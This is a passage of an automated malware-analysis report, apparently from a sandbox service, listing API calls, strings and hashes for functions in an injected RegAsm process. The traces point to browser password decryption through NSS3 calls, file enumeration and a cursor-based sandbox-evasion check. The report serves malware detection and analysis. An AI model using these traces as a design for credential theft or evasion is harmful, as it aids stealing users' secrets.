Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 6b0e33c4285e53549107531feea0468ebeb53bcbaa215fa9b6ec0526d3dbc27d
Instruction ID: 32794a91da73390fdc6c186c9727a95e91cabb986c83ec1948a71c83dc3811d0
Opcode Fuzzy Hash: 6b0e33c4285e53549107531feea0468ebeb53bcbaa215fa9b6ec0526d3dbc27d
Instruction Fuzzy Hash: 48518A72B116094FD708CDADDC527DABBDAABA4310F48C23AE842DB781D638E946C751

Function 0040A7D8 Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A815
lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
_memmove.LIBCMT ref: 0040A8BB
lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC
lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
String ID:
API String ID: 4058207798-0
Opcode ID: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
Instruction ID: 7253553526a9c866879b9953ce513a4e0df9f59d016b35785d070f4f95aa81eb
Opcode Fuzzy Hash: a697b237291ad732cff6152e98f2904289e14e348f3c7af2acd105475d3b2c95
Instruction Fuzzy Hash: 60315CB2D0421AAFDB10DB64DD849FAB7BCAF08345F5040BAF409E2240E7794A859F66

Function 0040CD37 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 298filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0040CD5C
FindFirstFileA.KERNEL32(?,?), ref: 0040CD73
StrCmpCA.SHLWAPI(?,004374EC), ref: 0040CD94
StrCmpCA.SHLWAPI(?,004374F0), ref: 0040CDAE

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

lstrlenA.KERNEL32(0040D3B5,00436872,004374F4,?,0043686F), ref: 0040CE41

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 0040D23C
FindClose.KERNEL32(?), ref: 0040D250

Strings

%s\*.*, xrefs: 0040CD56

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcatlstrlen$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
String ID: %s\*.*
API String ID: 833390005-1013718255
Opcode ID: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
Instruction ID: 06796af3159d5870cfde4b437f7530c4b10063cc36196476c106a896cedecc2d
Opcode Fuzzy Hash: e3119fbe257bcb94e031ea0aba949192674802f0e8d62e16cea99c2e2a5aeac3
Instruction Fuzzy Hash: C6D1DA71A4112DABDF20FB25DD46ADD77B5AF44308F4100E6A908B3152DB78AFCA8F94

Function 6C9CAEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CAECF46,?,6C9BCDBD,?,6CAEBF31,?,?,?,?,?,?,?), ref: 6C9CB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CAECF46,?,6C9BCDBD,?,6CAEBF31), ref: 6C9CB090
sqlite3_free.NSS3(?,?,?,?,?,?,6CAECF46,?,6C9BCDBD,?,6CAEBF31), ref: 6C9CB0A2
CloseHandle.KERNEL32(?,?,6CAECF46,?,6C9BCDBD,?,6CAEBF31,?,?,?,?,?,?,?,?,?), ref: 6C9CB100
sqlite3_free.NSS3(?,?,00000002,?,6CAECF46,?,6C9BCDBD,?,6CAEBF31,?,?,?,?,?,?,?), ref: 6C9CB115
sqlite3_free.NSS3(?,?,?,?,?,?,6CAECF46,?,6C9BCDBD,?,6CAEBF31), ref: 6C9CB12D

Part of subcall function 6C9B9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C9CC6FD,?,?,?,?,6CA1F965,00000000), ref: 6C9B9F0E
Part of subcall function 6C9B9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CA1F965,00000000), ref: 6C9B9F5D

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 87f0284400be966c66ac3c3d6db48513dc5b876649f6443daf32768119dfea36
Instruction ID: ddb79f812d6c9e886c8d687064339d9e1b5f8e829901de929331f2dfb162aa83
Opcode Fuzzy Hash: 87f0284400be966c66ac3c3d6db48513dc5b876649f6443daf32768119dfea36
Instruction Fuzzy Hash: B091BFB1B042058FEB04CF65C985B6BB7B9FF46308F184A2DE41697A50EB31E954CB93

Function 6CA9BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CA9BD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CA9BD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CA9BD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CA9BD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CA9BDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CA9BDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CA9BDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CA9BE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CA9BE1E

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: 74cf8ef711e1a17b849b82fd39ec0ade355e659ca16b7f1630ffc226573c97c1
Instruction ID: f1e8b3a9e3c476c0ac5cafdae6cece7d282ae2babc76a46db729c5a606ba03ad
Opcode Fuzzy Hash: 74cf8ef711e1a17b849b82fd39ec0ade355e659ca16b7f1630ffc226573c97c1
Instruction Fuzzy Hash: F321D576E2029957FF104796BD47F8B32F89B9178DF0C0214F926EE681F710949886A6

Function 6CB48D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CB914E4,6CAFCC70), ref: 6CB48D47
PR_GetCurrentThread.NSS3 ref: 6CB48D98

Part of subcall function 6CA20F00: PR_GetPageSize.NSS3(6CA20936,FFFFE8AE,?,6C9B16B7,00000000,?,6CA20936,00000000,?,6C9B204A), ref: 6CA20F1B
Part of subcall function 6CA20F00: PR_NewLogModule.NSS3(clock,6CA20936,FFFFE8AE,?,6C9B16B7,00000000,?,6CA20936,00000000,?,6C9B204A), ref: 6CA20F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CB48E7B
htons.WSOCK32(?), ref: 6CB48EDB
PR_GetCurrentThread.NSS3 ref: 6CB48F99
PR_GetCurrentThread.NSS3 ref: 6CB4910A

Strings

%u.%u.%u.%u, xrefs: 6CB48E74

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: a2c48aef6d17658f19cff50078c488921157f6707761380a9327d182adccd17a
Instruction ID: 447104b21cf3167dd4cfe27e700c050f19be8592da05bb619634d4a10cab73a7
Opcode Fuzzy Hash: a2c48aef6d17658f19cff50078c488921157f6707761380a9327d182adccd17a
Instruction Fuzzy Hash: F202DA31D492D18FDB04CF19C56876ABBB6EF42304F19C25AC8918BB99C332D949C3D2

Function 0040180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
SetThreadDesktop.USER32(00000000), ref: 0040182A
GetCursorPos.USER32(?), ref: 0040183A
Sleep.KERNEL32(000003E8), ref: 0040184A
GetCursorPos.USER32(?), ref: 00401859
Sleep.KERNEL32(00002710), ref: 0040186B
Sleep.KERNEL32(000003E8), ref: 00401870
GetCursorPos.USER32(?), ref: 0040187F

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CursorSleep$Desktop$InputOpenThread
String ID:
API String ID: 3283940658-0
Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58

Function 0040B93F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 319fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,00436826,?,?,?), ref: 0040B99B
StrCmpCA.SHLWAPI(?,0043743C), ref: 0040B9BC
StrCmpCA.SHLWAPI(?,00437440), ref: 0040B9D6

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

FindNextFileA.KERNEL32(?,?), ref: 0040BEF1
FindClose.KERNEL32(?), ref: 0040BF05

Strings

\*.*, xrefs: 0040B965

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 2390431556-1173974218
Opcode ID: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
Instruction ID: 085151aa20985cc1c24b900562e2038c57bb153a1e06efcc5d93ab1db404d891
Opcode Fuzzy Hash: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
Instruction Fuzzy Hash: 34E1DA7194012D9BCF21FB26DD4AACDB375AF44309F4100E6A508B71A1DB79AFC98F98

Function 6CB09D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C9C8637,?,?), ref: 6CB09E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C9C8637), ref: 6CB09ED6

Strings

database corruption, xrefs: 6CB09ECA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB09EC0
%s at line %d of [%.10s], xrefs: 6CB09ECF

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: b3d53f93ff7f39039ab95bb919342573efab133809b8fdf3bfb38410b1c95e7b
Instruction ID: 3812a712ab322cc888f7398852bc04e0c20fef2319cdb9745296a171a86e1c64
Opcode Fuzzy Hash: b3d53f93ff7f39039ab95bb919342573efab133809b8fdf3bfb38410b1c95e7b
Instruction Fuzzy Hash: 1781B331F012558FDB04CFAAC990ADEBBF6EF89304B148529E915ABB41E730ED49CB51

Function 0042B0CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B10B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B134
GetACP.KERNEL32(?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B148

Strings

OCP, xrefs: 0042B0EC
ACP, xrefs: 0042B0DB

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction ID: 9a82d2d165bf88aca29a0bf8e749ef3f3ea21aabb57aac8d650cc6d961d67086
Opcode Fuzzy Hash: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
Instruction Fuzzy Hash: 8901B531701626BAEB219B60BC16F6B77A8DB043A8F60002AE101E11C1EB68CE91929C

Function 00408048 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Strings

$g@, xrefs: 00408056

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: $g@
API String ID: 4291131564-2623900638
Opcode ID: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction ID: e9494377cad346e2cb6e0c3413faafdb083af89deffb74abb579b147fff80950
Opcode Fuzzy Hash: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
Instruction Fuzzy Hash: 7EF03C70101334BBDF315F26DC4CE8B7FA9EF06BA1F100456F949E6250E7724A40DAA1

Function 6CA99EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CA99ED6

